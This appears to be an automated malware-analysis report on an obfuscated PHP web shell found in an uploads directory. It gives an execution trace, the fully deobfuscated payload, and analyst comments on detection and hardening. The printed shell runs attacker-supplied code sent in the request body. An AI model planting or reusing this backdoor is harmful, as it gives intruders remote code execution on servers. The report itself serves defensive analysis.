PHP Malware Analysis

x.php

md5: 29fb7403f755fba6c7fbb3486e4fa6a7


Screenshot


Attributes

Encoding

Execution

Files

Input


Deobfuscated PHP code

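Failed to deobfuscate code automatically. The decoded payload can still be read from the execution trace below: it is the return value of the second str_replace call.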

Execution traces

data/traces/29fb7403f755fba6c7fbb3486e4fa6a7_trace-1676240638.3344.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:24:24.232201]
1	0	1	0.000176	393464
1	3	0	0.000241	396576	{main}	1		/var/www/html/uploads/x.php	0	0
1		A						/var/www/html/uploads/x.php	2	$r = 'strlen1H($t);$o=1H""1H;for($i=0;$i<1H$l;1H){f1Hor($j=0;($j<$c&1H&$i<$1Hl'
1		A						/var/www/html/uploads/x.php	3	$c = '$k="e91a1H1H1H7330";$1Hkh="b1Hac11Hfe3ab27e";$kf="1H69a41H65d59f1H59";$p="l'
1		A						/var/www/html/uploads/x.php	4	$Q = '"),$m)=1H=1) {@1Ho1Hb_s1Htart();@eva1Hl(@g1Hzu1H1Hncompress(@x(@bas1H1He64_decode('
1		A						/var/www/html/uploads/x.php	5	$k = '1H$m[1]),$k)))1H;$o=@o1Hb1H_get_cont1Hents()1H;@ob_end1H_c1H1Hlean();$r=@b1H'
1		A						/var/www/html/uploads/x.php	6	$F = '61HXsGm1H7Qungl1HL1HPBj";function x(1H$t,$k){1H$c=str1Hl1Hen($1Hk);$l=1H'
2	4	0	0.000333	396576	str_replace	0		/var/www/html/uploads/x.php	7	3	'D'	''	'crDeDDDate_funDcDtion'
2	4	1	0.000350	396712
2	4	R			'create_function'
1		A						/var/www/html/uploads/x.php	7	$t = 'create_function'
1		A						/var/www/html/uploads/x.php	8	$X = ');$j++1H,$1Hi++){$o1H1H.=$t{$i1H}^$k{$j};}1H}return 1H$o;1H}if (@1Hpreg'
1		A						/var/www/html/uploads/x.php	9	$R = '1H_match("/$k1H1Hh(.+)1H$kf/",@file1H1H_get_contents1H("ph1Hp://input1H'
1		A						/var/www/html/uploads/x.php	10	$P = 'as1He64_encod1He(@x(@gzco1Hmpr1Hess($o)1H,$k));1Hprint(1H"$p$kh$r1H$kf");}'
2	5	0	0.000417	397256	str_replace	0		/var/www/html/uploads/x.php	11	3	'1H'	''	'$k="e91a1H1H1H7330";$1Hkh="b1Hac11Hfe3ab27e";$kf="1H69a41H65d59f1H59";$p="l61HXsGm1H7Qungl1HL1HPBj";function x(1H$t,$k){1H$c=str1Hl1Hen($1Hk);$l=1Hstrlen1H($t);$o=1H""1H;for($i=0;$i<1H$l;1H){f1Hor($j=0;($j<$c&1H&$i<$1Hl);$j++1H,$1Hi++){$o1H1H.=$t{$i1H}^$k{$j};}1H}return 1H$o;1H}if (@1Hpreg1H_match("/$k1H1Hh(.+)1H$kf/",@file1H1H_get_contents1H("ph1Hp://input1H"),$m)=1H=1) {@1Ho1Hb_s1Htart();@eva1Hl(@g1Hzu1H1Hncompress(@x(@bas1H1He64_decode(1H$m[1]),$k)))1H;$o=@o1Hb1H_get_cont1Hents()1H;@ob_end1H_c1H1Hlean();'
2	5	1	0.000453	397864
2	5	R			'$k="e91a7330";$kh="bac1fe3ab27e";$kf="69a465d59f59";$p="l6XsGm7QunglLPBj";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
1		A						/var/www/html/uploads/x.php	11	$K = '$k="e91a7330";$kh="bac1fe3ab27e";$kf="69a465d59f59";$p="l6XsGm7QunglLPBj";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
2	6	0	0.000510	397128	create_function	0		/var/www/html/uploads/x.php	12	2	''	'$k="e91a7330";$kh="bac1fe3ab27e";$kf="69a465d59f59";$p="l6XsGm7QunglLPBj";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
3	7	0	0.000590	405168	{internal eval}	1		/var/www/html/uploads/x.php	12	0
3	7	1	0.000604	405168
3	7	R			NULL
2	6	1	0.000619	403800
2	6	R			'\000lambda_7'
1		A						/var/www/html/uploads/x.php	12	$p = '\000lambda_7'
2	8	0	0.000647	403736	__lambda_func	1		/var/www/html/uploads/x.php	12	0
2		A						/var/www/html/uploads/x.php(12) : runtime-created function	1	$k = 'e91a7330'
2		A						/var/www/html/uploads/x.php(12) : runtime-created function	1	$kh = 'bac1fe3ab27e'
2		A						/var/www/html/uploads/x.php(12) : runtime-created function	1	$kf = '69a465d59f59'
2		A						/var/www/html/uploads/x.php(12) : runtime-created function	1	$p = 'l6XsGm7QunglLPBj'
3	9	0	0.000707	403792	file_get_contents	0		/var/www/html/uploads/x.php(12) : runtime-created function	1	1	'php://input'
3	9	1	0.000727	404528
3	9	R			''
3	10	0	0.000741	404512	preg_match	0		/var/www/html/uploads/x.php(12) : runtime-created function	1	3	'/bac1fe3ab27e(.+)69a465d59f59/'	''	NULL
3	10	1	0.000790	404672
3	10	R			0
2	8	1	0.000806	404432
1	3	1	0.000813	404432
			0.000839	321776
TRACE END   [2023-02-12 20:24:24.232901]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php
// Analyst annotations (defensive reading of the sample; code below is unchanged).
//
// This file is an obfuscated loader for an eval-based backdoor. The payload source
// is split across $r, $c, $Q, $k, $F, $X, $R and $P, stored out of execution order,
// with the two-character filler "1H" spliced into identifiers and keywords. As a
// result, strings such as "eval", "base64_decode" or "php://input" never appear
// literally in the file, so keyword greps miss it. Signatures are better keyed on
// the reassembly pattern: str_replace() over concatenated string fragments whose
// result is passed to a function called through a variable.
// NOTE(review): the layout resembles publicly documented Weevely-style agent stubs;
// treat that as a triage hint, not as attribution.
$r='strlen1H($t);$o=1H""1H;for($i=0;$i<1H$l;1H){f1Hor($j=0;($j<$c&1H&$i<$1Hl';
$c='$k="e91a1H1H1H7330";$1Hkh="b1Hac11Hfe3ab27e";$kf="1H69a41H65d59f1H59";$p="l';
$Q='"),$m)=1H=1) {@1Ho1Hb_s1Htart();@eva1Hl(@g1Hzu1H1Hncompress(@x(@bas1H1He64_decode(';
$k='1H$m[1]),$k)))1H;$o=@o1Hb1H_get_cont1Hents()1H;@ob_end1H_c1H1Hlean();$r=@b1H';
$F='61HXsGm1H7Qungl1HL1HPBj";function x(1H$t,$k){1H$c=str1Hl1Hen($1Hk);$l=1H';
// Stripping the filler 'D' yields the string 'create_function' (confirmed by the
// str_replace return value in the execution trace). Building the callee name at
// run time keeps the dangerous function name out of the file's text.
$t=str_replace('D','','crDeDDDate_funDcDtion');
$X=');$j++1H,$1Hi++){$o1H1H.=$t{$i1H}^$k{$j};}1H}return 1H$o;1H}if (@1Hpreg';
$R='1H_match("/$k1H1Hh(.+)1H$kf/",@file1H1H_get_contents1H("ph1Hp://input1H';
$P='as1He64_encod1He(@x(@gzco1Hmpr1Hess($o)1H,$k));1Hprint(1H"$p$kh$r1H$kf");}';
// Reassembles the fragments in execution order and removes every "1H". Per the
// execution trace, the resulting source:
//   - sets a key $k, a header marker $kh, a footer marker $kf and a prefix $p;
//   - defines x($t,$k), a repeating-key XOR of $t with $k;
//   - reads the raw request body from php://input and looks for data between
//     $kh and $kf;
//   - runs that data through base64_decode -> x() -> gzuncompress and passes the
//     result to eval(), i.e. arbitrary code supplied by the requester;
//   - captures the output with output buffering, applies gzcompress -> x() ->
//     base64_encode, and prints it as "$p$kh<data>$kf".
// Most calls in the payload carry the @ operator, so failures produce no warnings
// or log noise. The fixed markers in request and response bodies are usable as
// network/WAF indicators for this specific sample.
$K=str_replace('1H','',$c.$F.$r.$X.$R.$Q.$k.$P);
// $t('',$K) is create_function('', <payload>): it compiles the payload as an
// anonymous function (the trace shows the internal eval) and $p() then runs it.
// The sample depends on create_function() and on the $str{$i} offset syntax, both
// removed in PHP 8.0, so it only executes on older interpreters.
// Hardening notes for defenders: the trace shows the file running from an uploads
// directory under the web root; script execution should be disabled for such
// directories, and create_function/eval can be restricted or alerted on where the
// application does not need them.
$p=$t('',$K);$p();
?>